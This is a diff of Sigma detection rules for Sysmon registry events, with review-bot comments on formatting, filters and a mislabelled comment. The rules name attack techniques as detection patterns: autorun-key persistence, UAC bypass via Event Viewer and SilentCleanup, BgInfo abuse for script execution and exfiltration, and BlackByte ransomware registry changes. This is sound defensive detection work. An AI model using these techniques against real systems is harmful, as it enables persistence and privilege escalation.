@@ -37,14 +36,14 @@ detection: - \Winlogon\AlternateShells\AvailableShells - \Windows\IconServiceLib - \Windows\Appinit_Dlls - - \Image File Execution Options + - \Image File Execution Options # Covered in better details in 36803969-5421-41ec-b92f-8500f79c23b0 - \Font Drivers - \Drivers32 - \Windows\Run - \Windows\Load filter_empty: Details: (Empty) - filter_legitimate_subkey: + filter_legitimate_subkey: # Legitimately used subkeys of \Image File Execution Options, which are not used for persistence (see https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/) TargetObject|contains: \Image File Execution Options\ TargetObject|endswith: - \DisableExceptionChainValidation @@ -53,12 +52,12 @@ detection: Image|startswith: C:\Program Files (x86)\Microsoft\Temp\ Image|endswith: \MicrosoftEdgeUpdate.exe filter_msoffice: - - TargetObject|contains: - - \ClickToRunStore\HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ - - \ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ - - Image: - - C:\Program Files\Microsoft Office\root\integration\integrator.exe - - C:\Program Files (x86)\Microsoft Office\root\integration\integrator.exe + - TargetObject|contains: + - \ClickToRunStore\HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ + - \ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ + - Image: + - C:\Program Files\Microsoft Office\root\integration\integrator.exe + - C:\Program Files (x86)\Microsoft Office\root\integration\integrator.exe filter_officeclicktorun: Image|startswith: - C:\Program Files\Common Files\Microsoft Shared\ClickToRun\ 
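Review bot: The comment attached to the `filter_legitimate_subkey:` key line is a full sentence plus a URL on the same line as the key, which is hard to read in a diff and unlike the other annotations in this file, which are short trailing remarks. I would move it onto its own line above the key, and since the hunk's reference to `36803969-5421-41ec-b92f-8500f79c23b0` explains why `\Image File Execution Options` stays in the selection, that line's comment should use `# Covered in better detail in 36803969-5421-41ec-b92f-8500f79c23b0`. The `TargetObject|endswith` list under `filter_legitimate_subkey` continues past the end of this hunk, so I could not check its remaining entries.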
@@ -77,20 +76,17 @@ detection: Image|endswith: \ngen.exe filter_onedrive: Image|endswith: \AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe - TargetObject|endswith: \Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached - Update Binary + TargetObject|endswith: \Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Update Binary Details|startswith: C:\Windows\system32\cmd.exe /q /c del /q "C:\Users\ Details|endswith: \AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe" - condition: registry_set and (nt_current_version_base and nt_current_version and - not 1 of filter_*) + condition: registry_set and (nt_current_version_base and nt_current_version and not 1 of filter_*) fields: - SecurityID - ObjectName - OldValueType - NewValueType falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reason + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason - Legitimate administrator sets up autorun keys for legitimate reason level: medium ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml index b96035714..a03e05d9c 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml 
@@ -1,16 +1,15 @@ title: Internet Explorer Autorun Keys Modification id: a80f662f-022f-4429-9b8c-b1a41aaa6688 related: - - id: 17f878b8-9968-4578-b814-c4217fc5768c - type: obsoletes + - id: 17f878b8-9968-4578-b814-c4217fc5768c + type: obsoletes status: test description: Detects modification of autostart extensibility point (ASEP) in registry. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d -author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, - oscd.community, Tim Shelton, frack113 (split) + - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys +author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) date: 2019/10/25 modified: 2023/08/17 tags: @@ -53,8 +52,7 @@ fields: - OldValueType - NewValueType falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reason + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason - Legitimate administrator sets up autorun keys for legitimate reason level: medium ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml index e5658e018..529a917b7 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml 
@@ -1,16 +1,15 @@ title: Office Autorun Keys Modification id: baecf8fb-edbf-429f-9ade-31fc3f22b970 related: - - id: 17f878b8-9968-4578-b814-c4217fc5768c - type: obsoletes + - id: 17f878b8-9968-4578-b814-c4217fc5768c + type: obsoletes status: experimental description: Detects modification of autostart extensibility point (ASEP) in registry. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d -author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, - oscd.community, Tim Shelton, frack113 (split) + - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys +author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) date: 2019/10/25 modified: 2023/08/17 tags: @@ -46,15 +45,19 @@ detection: - C:\Windows\System32\msiexec.exe - C:\Windows\System32\regsvr32.exe TargetObject|contains: + # Remove any unused addins in your environment from the filter + # Known addins for excel - \Excel\Addins\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\ - \Excel\Addins\ExcelPlugInShell.PowerMapConnect\ - \Excel\Addins\NativeShim\ - \Excel\Addins\NativeShim.InquireConnector.1\ - \Excel\Addins\PowerPivotExcelClientAddIn.NativeEntry.1\ + # Known addins for outlook - \Outlook\AddIns\AccessAddin.DC\ - \Outlook\AddIns\ColleagueImport.ColleagueImportAddin\ - \Outlook\AddIns\EvernoteCC.EvernoteContactConnector\ - \Outlook\AddIns\EvernoteOLRD.Connect\ + # - '\Outlook\Addins\GrammarlyAddIn.Connect' # Uncomment if you use Grammarly - \Outlook\Addins\Microsoft.VbaAddinForOutlook.1\ - \Outlook\Addins\OcOffice.OcForms\ - \Outlook\Addins\\OneNote.OutlookAddin 
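Review bot: The commented-out Grammarly entry in the second hunk, `# - '\Outlook\Addins\GrammarlyAddIn.Connect' # Uncomment if you use Grammarly`, is written differently from every sibling: it is quoted and has no trailing backslash, while the live entries (`- \Outlook\AddIns\EvernoteOLRD.Connect\`, `- \Outlook\Addins\OcOffice.OcForms\`) end with `\` so that `TargetObject|contains` only matches the add-in subkey itself. Whoever uncomments it as-is gets a broader match than the rest of the filter, so I would write it as `# - \Outlook\Addins\GrammarlyAddIn.Connect\ # Uncomment if you use Grammarly`. The `# Remove any unused addins in your environment from the filter` guidance is a good addition; the add-in list continues outside the hunk.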
@@ -78,8 +81,7 @@ fields: - OldValueType - NewValueType falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reason + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason - Legitimate administrator sets up autorun keys for legitimate reason level: medium ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml index d1856d703..5130bbd07 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml @@ -1,16 +1,15 @@ title: Session Manager Autorun Keys Modification id: 046218bd-e0d8-4113-a3c3-895a12b2b298 related: - - id: 17f878b8-9968-4578-b814-c4217fc5768c - type: obsoletes + - id: 17f878b8-9968-4578-b814-c4217fc5768c + type: obsoletes status: test description: Detects modification of autostart extensibility point (ASEP) in registry. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d -author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, - oscd.community, Tim Shelton, frack113 (split) + - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys +author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) date: 2019/10/25 modified: 2023/08/17 tags: 
@@ -37,16 +36,14 @@ detection: - \AppCertDlls filter: Details: (Empty) - condition: registry_set and (session_manager_base and session_manager and not - filter) + condition: registry_set and (session_manager_base and session_manager and not filter) fields: - SecurityID - ObjectName - OldValueType - NewValueType falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reason + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason - Legitimate administrator sets up autorun keys for legitimate reason level: medium ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml index 989357d6d..60a58c161 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml 
@@ -1,16 +1,15 @@ title: System Scripts Autorun Keys Modification id: e7a2fd40-3ae1-4a85-bf80-15cf624fb1b1 related: - - id: 17f878b8-9968-4578-b814-c4217fc5768c - type: obsoletes + - id: 17f878b8-9968-4578-b814-c4217fc5768c + type: obsoletes status: test description: Detects modification of autostart extensibility point (ASEP) in registry. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d -author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, - oscd.community, Tim Shelton, frack113 (split) + - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys +author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) date: 2019/10/25 modified: 2023/08/17 tags: @@ -41,8 +40,7 @@ fields: - OldValueType - NewValueType falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reason + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason - Legitimate administrator sets up autorun keys for legitimate reason level: medium ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml index 583c61122..0e3a1660b 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml 
@@ -1,16 +1,15 @@ title: WinSock2 Autorun Keys Modification id: d6c2ce7e-afb5-4337-9ca4-4b5254ed0565 related: - - id: 17f878b8-9968-4578-b814-c4217fc5768c - type: derived + - id: 17f878b8-9968-4578-b814-c4217fc5768c + type: derived status: test description: Detects modification of autostart extensibility point (ASEP) in registry. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d -author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, - oscd.community, Tim Shelton, frack113 (split) + - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys +author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) date: 2019/10/25 modified: 2023/08/17 tags: @@ -31,19 +30,17 @@ detection: - \Protocol_Catalog9\Catalog_Entries - \NameSpace_Catalog5\Catalog_Entries filter: - - Details: (Empty) - - Image: C:\Windows\System32\MsiExec.exe - - Image: C:\Windows\syswow64\MsiExec.exe - condition: registry_set and (winsock_parameters_base and winsock_parameters and - not filter) + - Details: (Empty) + - Image: C:\Windows\System32\MsiExec.exe + - Image: C:\Windows\syswow64\MsiExec.exe + condition: registry_set and (winsock_parameters_base and winsock_parameters and not filter) fields: - SecurityID - ObjectName - OldValueType - NewValueType falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reason + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason - Legitimate administrator sets up autorun keys for legitimate reason level: medium ruletype: Sigma 
diff --git a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml index 72989089a..ddcb43c01 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml @@ -1,17 +1,16 @@ title: Wow6432Node CurrentVersion Autorun Keys Modification id: b29aed60-ebd1-442b-9cb5-16a1d0324adb related: - - id: 17f878b8-9968-4578-b814-c4217fc5768c - type: obsoletes + - id: 17f878b8-9968-4578-b814-c4217fc5768c + type: obsoletes status: experimental description: Detects modification of autostart extensibility point (ASEP) in registry. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d + - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys - https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/ -author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, - oscd.community, Tim Shelton, frack113 (split) +author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) date: 2019/10/25 modified: 2023/08/17 tags: 
@@ -55,12 +54,12 @@ detection: - C:\Program Files (x86)\Microsoft Office\root\integration\integrator.exe TargetObject|contains: \Explorer\Browser Helper Objects\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}\ filter_dropbox: - - Details|endswith: -A251-47B7-93E1-CDD82E34AF8B} - - Details: grpconv -o - - Details|contains|all: - - C:\Program Files - - \Dropbox\Client\Dropbox.exe - - ' /systemstartup' + - Details|endswith: -A251-47B7-93E1-CDD82E34AF8B} + - Details: grpconv -o + - Details|contains|all: + - C:\Program Files + - \Dropbox\Client\Dropbox.exe + - ' /systemstartup' filter_evernote: TargetObject|endswith: \Explorer\Browser Helper Objects\{92EF2EAD-A7CE-4424-B0DB-499CF856608E}\NoExplorer filter_dotnet: 
@@ -86,25 +85,24 @@ detection: - C:\Windows\Temp\ Image|contains: - \winsdksetup.exe - - \windowsdesktop-runtime- - - \AspNetCoreSharedFrameworkBundle- + - \windowsdesktop-runtime- # C:\WINDOWS\Temp\{751E2E78-46DC-4376-9205-99219CDC34AE}\.be\windowsdesktop-runtime-6.0.12-win-x86.exe + - \AspNetCoreSharedFrameworkBundle- # "C:\ProgramData\Package Cache\{b52191c1-a9c0-4b34-9a4e-930c2dd8a540}\AspNetCoreSharedFrameworkBundle-x86.exe" /burn.runonce Details|endswith: ' /burn.runonce' filter_uninstallers: + # This image path is linked with different uninstallers when running as admin unfortunately Image|startswith: C:\Windows\Installer\MSI TargetObject|contains: \Explorer\Browser Helper Objects filter_msiexec: Image: C:\WINDOWS\system32\msiexec.exe TargetObject|contains: \SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ - condition: registry_set and (all of selection_wow_current_version_* and not 1 - of filter_*) + condition: registry_set and (all of selection_wow_current_version_* and not 1 of filter_*) fields: - SecurityID - ObjectName - OldValueType - NewValueType falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reason + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason - Legitimate administrator sets up autorun keys for legitimate reason level: medium ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml index 176ff0480..e8fceeea5 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml 
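Review bot: The new comment on `filter_uninstallers` admits that `Image|startswith: C:\Windows\Installer\MSI` is shared by many uninstallers, but that limitation is not reflected in the rule's `falsepositives:` list, which this same hunk reflows. Since the filter excludes any image staged under that prefix that touches `\Explorer\Browser Helper Objects`, I would add a `falsepositives` entry such as `- Browser Helper Object registration by MSI custom actions staged under C:\Windows\Installer\MSI (excluded by filter_uninstallers)` so operators know what the exclusion covers. I would also tidy the comment wording to `# Unfortunately this image path prefix is shared by many different uninstallers when run as admin`. The `Image|contains` list at the top of the hunk belongs to a filter whose start lies outside the hunk.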
@@ -1,16 +1,15 @@ title: Wow6432Node Classes Autorun Keys Modification id: 18f2065c-d36c-464a-a748-bcf909acb2e3 related: - - id: 17f878b8-9968-4578-b814-c4217fc5768c - type: obsoletes + - id: 17f878b8-9968-4578-b814-c4217fc5768c + type: obsoletes status: test description: Detects modification of autostart extensibility point (ASEP) in registry. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d -author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, - oscd.community, Tim Shelton, frack113 (split) + - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys +author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) date: 2019/10/25 modified: 2023/08/17 tags: @@ -49,8 +48,7 @@ fields: - OldValueType - NewValueType falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reason + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason - Legitimate administrator sets up autorun keys for legitimate reason level: medium ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml index 3d65758d7..bfd1ffbed 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml 
@@ -1,16 +1,15 @@ title: Wow6432Node Windows NT CurrentVersion Autorun Keys Modification id: 480421f9-417f-4d3b-9552-fd2728443ec8 related: - - id: 17f878b8-9968-4578-b814-c4217fc5768c - type: obsoletes + - id: 17f878b8-9968-4578-b814-c4217fc5768c + type: obsoletes status: experimental description: Detects modification of autostart extensibility point (ASEP) in registry. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d -author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, - oscd.community, Tim Shelton, frack113 (split) + - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys +author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) date: 2019/10/25 modified: 2023/08/17 tags: @@ -34,18 +33,15 @@ detection: filter: Details: - (Empty) - - \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image - File Execution Options - condition: registry_set and (wow_nt_current_version_base and wow_nt_current_version - and not filter) + - \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options + condition: registry_set and (wow_nt_current_version_base and wow_nt_current_version and not filter) fields: - SecurityID - ObjectName - OldValueType - NewValueType falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reason + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason - Legitimate administrator sets up autorun keys for legitimate reason level: medium ruletype: Sigma 
diff --git a/sigma/sysmon/registry/registry_set/registry_set_bginfo_custom_db.yml b/sigma/sysmon/registry/registry_set/registry_set_bginfo_custom_db.yml index 48dd6c2b4..c845e8670 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_bginfo_custom_db.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_bginfo_custom_db.yml @@ -1,9 +1,7 @@ title: New BgInfo.EXE Custom DB Path Registry Configuration id: 53330955-dc52-487f-a3a2-da24dcff99b5 status: experimental -description: Detects setting of a new registry database value related to BgInfo configuration. - Attackers can for example set this value to save the results of the commands executed - by BgInfo in order to exfiltrate information. +description: Detects setting of a new registry database value related to BgInfo configuration. Attackers can for example set this value to save the results of the commands executed by BgInfo in order to exfiltrate information. references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) @@ -20,7 +18,7 @@ detection: EventID: 13 Channel: Microsoft-Windows-Sysmon/Operational selection: - EventType: SetValue + EventType: SetValue TargetObject|endswith: \Software\Winternals\BGInfo\Database condition: registry_set and selection falsepositives: diff --git a/sigma/sysmon/registry/registry_set/registry_set_bginfo_custom_vbscript.yml b/sigma/sysmon/registry/registry_set/registry_set_bginfo_custom_vbscript.yml index 9301435f7..b34aa38a8 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_bginfo_custom_vbscript.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_bginfo_custom_vbscript.yml 
@@ -1,11 +1,10 @@ title: New BgInfo.EXE Custom VBScript Registry Configuration id: 992dd79f-dde8-4bb0-9085-6350ba97cfb3 related: - - id: cd277474-5c52-4423-a52b-ac2d7969902f - type: similar + - id: cd277474-5c52-4423-a52b-ac2d7969902f + type: similar status: experimental -description: Detects setting of a new registry value related to BgInfo configuration, - which can be abused to execute custom VBScript via "BgInfo.exe" +description: Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom VBScript via "BgInfo.exe" references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) @@ -22,9 +21,9 @@ detection: EventID: 13 Channel: Microsoft-Windows-Sysmon/Operational selection: - EventType: SetValue + EventType: SetValue TargetObject|contains: \Software\Winternals\BGInfo\UserFields\ - Details|startswith: '4' + Details|startswith: '4' # WMI condition: registry_set and selection falsepositives: - Legitimate VBScript diff --git a/sigma/sysmon/registry/registry_set/registry_set_bginfo_custom_wmi_query.yml b/sigma/sysmon/registry/registry_set/registry_set_bginfo_custom_wmi_query.yml index 925672efa..97ef4e312 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_bginfo_custom_wmi_query.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_bginfo_custom_wmi_query.yml 
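Review bot: The `# WMI` comment added on `Details|startswith: '4'` contradicts this rule, whose title and falsepositives entry are about custom VBScript; the sibling WMI-query rule in the next file tags `'6' # WMI`, so the label here looks copy-pasted and should presumably read `Details|startswith: '4' # VBScript`. Documenting the wrong field type on the one value that distinguishes the two rules will mislead anyone tuning them.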
@@ -1,11 +1,10 @@ title: New BgInfo.EXE Custom WMI Query Registry Configuration id: cd277474-5c52-4423-a52b-ac2d7969902f related: - - id: 992dd79f-dde8-4bb0-9085-6350ba97cfb3 - type: similar + - id: 992dd79f-dde8-4bb0-9085-6350ba97cfb3 + type: similar status: experimental -description: Detects setting of a new registry value related to BgInfo configuration, - which can be abused to execute custom WMI query via "BgInfo.exe" +description: Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom WMI query via "BgInfo.exe" references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) @@ -22,9 +21,9 @@ detection: EventID: 13 Channel: Microsoft-Windows-Sysmon/Operational selection: - EventType: SetValue + EventType: SetValue TargetObject|contains: \Software\Winternals\BGInfo\UserFields\ - Details|startswith: '6' + Details|startswith: '6' # WMI condition: registry_set and selection falsepositives: - Legitimate WMI query diff --git a/sigma/sysmon/registry/registry_set/registry_set_blackbyte_ransomware.yml b/sigma/sysmon/registry/registry_set/registry_set_blackbyte_ransomware.yml index 2c5a3d4fb..fdefa242c 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_blackbyte_ransomware.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_blackbyte_ransomware.yml @@ -1,8 +1,7 @@ title: Blackbyte Ransomware Registry id: 83314318-052a-4c90-a1ad-660ece38d276 status: test -description: BlackByte set three different registry values to escalate privileges - and begin setting the stage for lateral movement and encryption +description: BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption references: - https://redcanary.com/blog/blackbyte-ransomware/?utm_source=twitter&utm_medium=social - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/ 
diff --git a/sigma/sysmon/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml b/sigma/sysmon/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml index f6efa7c1d..631ca297c 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml @@ -1,8 +1,7 @@ title: Bypass UAC Using Event Viewer id: 674202d0-b22a-4af4-ae5f-2eda1f3da1af status: experimental -description: Bypasses User Account Control using Event Viewer and a relevant Windows - Registry modification +description: Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification references: - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-1---bypass-uac-using-event-viewer-cmd diff --git a/sigma/sysmon/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml b/sigma/sysmon/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml index 35657e3f3..cfa5992c4 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml 
@@ -1,9 +1,7 @@ title: Bypass UAC Using SilentCleanup Task id: 724ea201-6514-4f38-9739-e5973c34f49a status: test -description: There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe - This can be abused to elevate any file with Administrator privileges without prompting - UAC +description: There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-9---bypass-uac-using-silentcleanup-task - https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/ diff --git a/sigma/sysmon/registry/registry_set/registry_set_change_rdp_port.yml b/sigma/sysmon/registry/registry_set/registry_set_change_rdp_port.yml index 7ebb18ce1..77226fad2 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_change_rdp_port.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_change_rdp_port.yml 
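Review bot: The reflowed `description:` now runs two sentences together without punctuation (`...\cleanmgr.exe This can be abused...`), which reads as one garbled sentence on the rendered rule. Suggest `description: There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe. This can be abused to elevate any file with Administrator privileges without prompting UAC.`, or the `|` block-scalar form this commit uses for other multi-sentence descriptions to keep the sentences on separate lines.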
